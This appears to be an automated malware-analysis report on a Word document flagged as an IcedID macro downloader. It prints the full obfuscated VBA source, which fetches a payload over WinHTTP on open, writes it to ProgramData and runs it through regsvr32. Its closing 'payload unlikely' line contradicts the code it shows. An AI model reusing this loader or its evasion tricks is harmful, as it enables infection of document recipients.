Verdict: MALICIOUS
Risk Score: 290
Heuristics: 7

- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings): Document contains a VBA project; VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: Set sWAwz = CreateObject(iWPVg + "." + "shell")
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: Set ekKeM = VBA.CreateObject(Cpzkl + "" + QHcQF)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: Sub AutoOpen()
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 28 URLs extracted from this sample are OOXML schema namespace URIs (schemas.microsoft.com/office/... and schemas.openxmlformats.org/...) labelled "In document text (OOXML body / shared strings)"; none was reached from the macro.
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14032 bytes |

SHA-256: 9decf4281e6d045355987f9cc69c0309e303d3e0d0c27c5238c564b395776af8

Preview script: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "nuzaQ"
Sub DahBf(UeHUM, Optional ByVal daACi As String = "c:\programdata\ZTqoQ.txt", Optional ByVal QHcQF As String = "systemobject")
' Blooms culminated bishoprics
' Plexus mandibles waveform suitably
' Nightdresses overcompensate
' Incoherently rainy
' Palette signor deleting turncoats
' Strive
' Enclosures goes
' Diameters moleskin skipping
' Hive blindness
' Probationary rankers strenuous
' Extremes chinks dudgeon reallocate floater
' Wheedled immunologists entailed wallop
' Starstruck cultivar
' Warm objection beautifully
' Yielded waverers accelerating sanctity roundabout
' Instability waist mondays excursions
' Factitious interactive henge attractor genie
' Sends
' Transmute costar criticised visibilities procrastinator
' Temperate melodrama jars
' Inevitability
' Lichens professor israel
' Wooed veranda program mailmen ceramist convey manic
' Underlings calligrapher
Set ekKeM = VBA.CreateObject(Cpzkl + "" + QHcQF)
' Serried appetising
' Dailies dossier adjudicates realms troubling yankees cogent
' Forced
' Holeinone tissue headwaters signifies
' Runofthemill dissatisfied vituperative
' Photochemical stripper fondest credibility
Set RTuNF = ekKeM.CreateTextFile(daACi)
' Hullo
' Hygiene gelatin
' Gutters upstart subtropical pattering disciplined
' Rehousing trudge angular
' Defraud inherit planters cipher fossilised
' Overseas boron
RTuNF.WriteLine UeHUM
' Emplacement
' Maintainable corollary ascension cleanser defence
' Appropriated
' Apartments
' Stubby adhoc patched
' Travesties surfs
RTuNF.Close
' Womaniser
' Validation intelligentsia coordinator
' Shying echoic taxidermy confluent incidence
' Scrums offbeat referrals reclining formulaic
' Ringmaster mesmerised undiscerning
' Bubbled pinions provable
' Revanchist
' Discernibly pined unskilled
' Scouring fairway
' Hangman past curiosity
' Avulsion notion auric
' Incurably radiator
' Kidding jeans antedate communicants
' Shirking nudities
' Differentiators tormentors surfers cosmopolitans
' Homecoming frugally midnights destine refines exotically
' Refuelled availability
' Larynxes trad
' Undermined live workloads glitzy
' Clasped skintight teems humanoids
' Mentors addressability deflowering proximally
' Strict overdubbing steradians
' Twelve
' Union backbones interruptibility
' Corroded
' Speculum devours prejudicial capitally paralyse grudges
' Elands devoting special
' Oddments ovary seamed flexibly
' Bonuses
' Thrifts neighbours
' Anthropomorphic forum vernier initially
' Spread alcoholics maul percussing obliviousness kindness
' Mitigates dissenters
' Colouring crop
' Electronics destroys
' Revolvers inconsistent determinable
' Digests straggle goosestepping
End Sub
' Palaeolithic
' Colleague absolutists
' Curvature biomass sloppy robotics exterminator feathering
' Levity calligraphic maltreat epiphanies
' Libya seducers congressional simpletons worthlessness purification
Sub AutoOpen()
' Battlecry maladjusted shrimps
' Bamboozled
' Bating pretty mono handout
' Beadles legitimating
' Poured berber
' Bolstered bloodthirsty translate
' Crores spools
' Curls
' Refiner plasmid
' Gluttons
' Firstly foray
' Gushing koreans robbed visibilities globes delinquent degradations waking
' Storks stators underdone squeezer bidding
' Parsings retails responded mistrustful thorn
' Healed biscuity
' Harangued semantic companions
' Leafiness occipital intrinsically
' Grunge coexist assumption availability
' Stronger blithe hems alliterated
' Lain corrects legacy machetes holdall rapped
' Skyscraper
' Rain shortsightedly recombines prohibited
' Urbanisation stretched gustiest treachery succulent consultant externalised
' Pippin malevolent phrases tees curtaining
' Spirituals buttress herds stifle sag
' Parrots impassiveness clover
' Sunshine mats sure
' Catching guesting moderator assails grainier
' Chapel sort initialled gladness surge
' Notions potent lascivious
' Wetsuit argot pilot
' Ironage breezed tasteful flirtation subaltern
Dim LmUZM As New dzAJk
' Laxatives implicit yarns
' Sedated squeaker
' Telescoped incoherency bumpkin
' Enquires bouncy hydrocarbons lumen mediator haircare
' Tooled reverent remarking muzzles
' Tusker bonneted throttled tenon
' Restrict muddled bastardy tempter enthusiastically
JMcwE = ""
' Fogs confrontation
' Murmured donning mortice doornail cycling replying
' Decay grazer meteorologist bloodsuckers
' Byelection
' Palled bridge
' Folds embarrassment eke hosanna popeyed blunderbuss
' Diametrically contacted garments
' Retrieved fattening vandalising wafer pollutant
' Pirouettes microscopically bistable
' Impersonate sardines
' Abound drizzly rigidities unduly
UeHUM = LmUZM.aszML(GRgFE)
' Convertible melody banditry freezer
' Mergers bitmap county revived unhappier professed
' Broiled
' Wake incarnate truffles gunpowder
' Psaltery tillage entomology washout practise
DahBf Xvpgd(UeHUM)
' Coup questions
' Malnutrition deports euphemistically
' Peopled stabilised shanks carve reverberations baths
' Encrustation claws
' Contorting
' Cogency were truer degaussed
' Unfolding aglow uninhabited
' Leverage swords
' Maladaptive oinked
' Amiss recantation immobilises antedating soundtracks
' Adulation enemies addled moorhens turfy despoil
' Freak laments lightheartedly mortgages
UHenC wIPiZ(0) + "vr32 c:\programdata\ZTqoQ.txt", "wscript"
End Sub
Function YDNxJ(wweiX, atlSH)
' Menacingly decelerations
' Knuckleduster reconstitute rumania proclaimed
' Humbleness yak absconded birdtables desalination
' Stairhead scimitars spoonfuls
' Rethinking treadle ground today domineering impulsive
' Copulations
YDNxJ = Split(wweiX, atlSH)
End Function
Attribute VB_Name = "ZcURs"
' Centrefold panels batsmen lampoonery backwards
' Sententiously heartbreaks
' Bowlers inaudibility quotients implemented
' Unhappiest rejections espoused pouting gruesome glimmerings
' Girls attack heavily
Function Xvpgd(LyHrB)
' Selector anorexia
' Crashing undetectability pronunciations moderated
' Swoops hazily upon
' Hypoglycaemia acidophiles
' Floppier grandly stylist
Xvpgd = StrConv(LyHrB, vbUnicode)
' Beneficially
' Rag grandparents dramatisations dullards countenance consented
' Shakable dyspeptic conquistador
' Pikestaff
' Vesicular nonplussed remunerate
' Cranking underrated pretty
End Function
' Diversely shaman bushiness mandibular
' Expediency vomits fullblooded fences retrieved
' Infestation facilitated
' Tarpaulin
Function Uwnpm()
' Rushes exempted prelates dealer giveaway tightrope
' Changer childcare teaches glow swags
' Punts cittern halon
' Foible answered descriptively apologetic exhibitionists
' Showground whispers
' Motherland swapped traced peeps workmates thor
' Ovens caution draughtier turbocharger
' Onyx overlong
' Semantically trailing unexceptionable goodhope
' Cube presses apostolic
' Harassment seems
With ActiveDocument.shapes(1)
Uwnpm = .AlternativeText
End With
End Function
' Parenting tolled stunts
' Graptolites reconstruction student pestle
' Overshadow kidney
' Melt potpourri encroached swiftly inextricably blockbuster turnround
' Vainglory
Function wIPiZ(CWntH)
' Containment omnivore assassins orca glowworms pared
' Reminisces repatriation fits
' Uprightly exaggerating deepseated gale danger
' Ratings appointed palpitated ted
' Ages warranted tonguetied
' Dogmatic paragraphs inefficient unvisited
' Evangelists sidings
' Bug worm
' Fornicators pentagrams toyshop touchdown barber
' Deluged lullabies bounty stormiest endpapers transfer
' Wee synapses unfailing
' Decriminalised questionnaire
PgrYO = YDNxJ(Uwnpm(), "~~~")
UELZW = PgrYO(CWntH)
wIPiZ = UELZW
End Function
Attribute VB_Name = "dzAJk"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function RspAp(tbWvV, UAJQN, ebRBR)
' Cables
' Interviewee tonguetwister
' Vegetables churning
' Modify disdainfully mournfully stalked graphed
' Steepness disengaging anchorage bumbling pedagogue
' Unparodied primogeniture drool adjudged
' Unsmooth internalises indignation topologist
RspAp = Mid(tbWvV, UAJQN, ebRBR)
End Function
Public Function jhUiM(tprPi, PVCra)
' Guise epitomises
' Imagery
' Douching pointer
' Undermine insult squeak schoolteacher
' Repudiates curse blockbusters
' Complicate priesthood stretch wolds
' Agio commonalities
' Inconceivable dampens revocations tangentially cine
' Maintainable inadvertently lumbar flack
' Forgiveness bingo
' Marques allegation ornament
' Impales fabric clefts pew
' Joker venus goalscorers miscarriages flowed
' Solidification noting
' Haemophiliacs replenish discourages similarly
' Trendy grapnel
obAtN = Trim(tprPi)
For WlEUI = PVCra To Len(obAtN)
DJNha = RspAp(obAtN, WlEUI, PVCra) & DJNha
Next WlEUI
jhUiM = DJNha
End Function
' Repopulated chilliness adversaries wellread intaglio
' Guinea worming panicstricken
' Reinterpreted inhabitant humanists
' Subjects drafts
' Pertained
' Overstress proletarianisation
Function aszML(OCtBU)
' Statesmen essence printings somersaults befitted conflicted
' Counterfeited espousing flabbier parented exertions
' Bullfrog carbohydrate rediscover
' Monstrously pester firmed apostle
' Shiver auctioneer
' Recruit leather education
' Flooded dodgy vote ibex
Dim CPOpQ As Object
' Didactic fern exception tooling
' Despatching omissions belladonna epitap
' Allocate hurtling
' Bursars hangouts wealthier
' Brochure majestic protons bureaux
' Cases commemorated yawn sherlock instituted inwardness
' Symptomless formations immorality swelling
' Burdock mazes
' Reoccur tonne
' Socialists pickerel
' Arcadia recruited
' Untaught indomitable broccoli
' Dazzled hereby windswept spontaneous
Set CPOpQ = CreateObject(jhUiM(OCtBU, 1) + "." + jhUiM(OCtBU, 1) + "Request.5.1")
' Infiltrate unworried rhyme massacre fielding
' Remorseful comedy avalanching
' Distinguishable harvests rather
' Parries hedonists diary screwdrivers processable
' Postlude flunked campfire wide redundant
' Gallant curbed storehouse suggestiveness
' Chafes basically discern
' Anthropoid fanfare reference deliriously
' Furnishes
' Substantiation conciliator vampires diverticular
' Overgeneralised aftertaste
' Guns mention
' Sizzled
' Overcame
' Constituted buglers
' Omniscient pallid turntables
' Gdansk tackier spectrophotometry schema
' Opportunistically frowning transhipment
' Unlacing lantern clearly eerily
' Flexor
' Chagrin disgraceful
' Assortments shrubby bashfulness nobodies
' Imbiber lasses neck sculled clamours ledger
' Lifeguard adapts uproots relinking rests roofgarden
' Undulations instigators batik
' Disastrously
' Discrete thaw nightly hiding flattered
XDQVO = wIPiZ(1)
' Donkeys incites blockers enjoying soliciting
' Mausoleum matchplay spit
' Gird impeccably assertions coined
' Broadcasting becomes pressings grates regretting watchmen
' Businessmen lexicographer
' Dairying punitive cherish
CPOpQ.Open "GET", jhUiM(XDQVO, 1), False
' Olympics indulged defrauded
' Thawing
' Stuckup diffidently hewing
' Pedants
' Trunk engarde sloppiest headlamp
CPOpQ.Send
' Pains touchdowns gainsaying sportingly loquacity stalkers
' Platelet promisingly shifted beggar aluminum czar
' Observably
' Profiling overcrowding
aszML = CPOpQ.responsebody
End Function
Attribute VB_Name = "Jxcgk"
Public Const GRgFE As String = "ptthniw"
Public Const Cpzkl As String = "scripting.file"
Sub UHenC(bGLFH, iWPVg)
' Bloke gowns
' Caucuses sourness turnovers
' Pedalled pulsates damming toning stubborn
' Tenor rome
' Keyhole
' Donors prosecuted injustice regimental
Set sWAwz = CreateObject(iWPVg + "." + "shell")
' Ally reacquired seasoned
' Veranda intoxicated
' Dress inordinate diuretic halite persecutor
' Pumice sculler pubs david sprinted angering
' Cabbages
' Scythes littering pygmy unambiguity
' Remedial forfeiture unsinkable survivable
' Reattachment compatibles trumpet oversimplifications
' Adapters
' Propitiating crossbred reveille spirit
' Straddle overstuffed abe exults
' Prepays secluded
' Lynx precept hob
' Automotive declarations
' Pluckiest crotchetiness
' Koreans
' Housebuilder
' Mammal
' Disadvantages recuperate
' Allegro bibliographical intercontinental
' Spirits
' Tortured dispersal marching aupairs
' Chemist patently continuance robots alleys recognisably
' Unwieldy blandishments pickaxe
' Sleaze
' Incursion foil negotiates
' Perfected levitates
' Commissars context
' Madwoman transducer his tutu proprietary poorness
' Adulterous corkage
' Accursed
' Blister scarifying isotropically
' Necessitate distribution presidential freeway
' Breezier shearing lunchtime shrugged extremes
' Permutations concludes ripeness pyjamas
' Mid postcode distorts
' Playboy lymphocyte quainter
' Encores standardises
' Aggregated banning
' Wreathes timetabled approvingly
' Apprehensively
' Ornamental proofs agrarian ripostes
' Supple
' Mariners reservoirs
' Rebalanced abbey
' Inaccuracy abacus printing infringements
Call sWAwz.exec(bGLFH)
' Adaptively initialising slashed parallaxes weeds
' Whitewash broomsticks regent
' Glowworms aunts merchantmen
' Breastplate
' Underworld restraint debilitated triangulation dilettantes chatty
' Transitions convert broadway
' Paradigms feigned unqualified paraphrase maladroit amulets bracer
End Sub
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 49664 bytes |

SHA-256: 0b5cebc697a1c53e47eda0d330875786a65472433ce78853b04b5ef63129da03

Detection: ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely